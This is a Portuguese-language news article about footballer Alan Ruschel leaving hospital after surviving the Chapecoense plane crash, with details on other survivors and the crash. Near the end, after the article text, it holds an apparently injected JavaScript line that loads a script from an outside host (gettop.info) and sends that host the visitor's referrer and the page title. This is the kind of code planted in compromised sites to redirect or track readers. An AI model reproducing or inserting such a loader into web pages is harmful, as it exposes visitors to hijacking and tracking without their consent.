Alan Ruschel recebe alta e já está em casa

Alan Ruschel foi aplaudido pelos torcedores na saída do hospital e vai dar entrevista coletiva amanhã. Foto: Reprodução
 

O lateral Alan Ruschel deixou o hospital nesta sexta-feira (16). Ele foi o primeiro sobrevivente brasileiro do desastre envolvendo o voo que levava a delegação da Chapecoense à Colômbia a deixar o hospital.  O atleta saiu da instituição de Chapecó (SC) numa cadeira de rodas, mas se levantou e caminhou por um pequeno trecho até entrar no carro de um conhecido. 

Alan Ruschel estava internado em um hospital de Chapecó desde a terça-feira à noite. Na saída, acenou para a imprensa – vai dar entrevista coletiva amanhã – e para torcedores que estavam em frente ao local e o aplaudidram. Também deu um abraço no meia Hyoran, que foi vendido ao Palmeiras e ficou fora da trágica viagem por conta de uma lesão no joelho.

Seguem internados no hospital chapecoense o jornalista Rafael Henzel e o zagueiro Neto, que chegou à cidade na noite de quinta-feira. Os outros dois sobreviventes da tragédia foram os tripulantes bolivianos Ximena Suárez e Erwin Tumirik.

A queda do avião da Chapecoense vitimou 71 pessoas, entre elas 19 jogadores e membros da comissão técnica e da diretoria. A aeronave ficou sem combustível e caiu nos arredores da cidade colombiana de Medellín no dia 29 de novembro.

O time viajava à cidade para disputar o primeiro jogo da final da Copa Sul-Americana, contra o Atlético Nacional. Após a tragédia, a Conmebol concordou em cancelar a decisão e aclamou a Chapecoense como campeã do torneio, a pedido da equipe colombiana.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário